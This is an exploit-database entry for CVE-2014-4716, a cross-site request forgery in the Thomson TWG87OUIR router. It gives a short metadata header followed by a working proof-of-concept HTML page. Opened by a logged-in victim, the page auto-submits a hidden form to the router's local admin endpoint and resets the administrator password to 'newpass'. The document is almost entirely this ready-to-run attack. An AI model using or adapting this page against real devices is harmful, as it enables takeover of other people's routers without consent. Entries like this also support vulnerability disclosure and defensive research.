Thomson TWG87OUIR - POST Password Cross-Site Request Forgery

Author: nopesled
type: webapps
platform: hardware
port: 
date_added: 2014-06-25 
date_updated: 2014-06-25 
verified: 0 
codes: OSVDB-108397;CVE-2014-4716 
tags: 
aliases:  
screenshot_url:  
application_url: 

#Author: nopesled
#Date: 24/06/14
#Vulnerability: POST Password Reset CSRF
#Tested on: Thomson TWG87OUIR (Hardware Version)

<html>
<head>
	<title>Thomson TWG87OUIR CSRF</title>
</head>
<body>
     <form name="exploit" method="post"
	action="http://192.168.0.1/goform/RgSecurity">
	<input type="hidden" name="HttpUserId" value="" />
	<input type="hidden" name="Password" value="newpass" />
	<input type="hidden" name="PasswordReEnter" value="newpass" />
	<input type="hidden" name="RestoreFactoryNo" value-="0x00" />
     </form>
     <script type="text/javascript">
	document.exploit.submit();
     </script>
</body>
</html>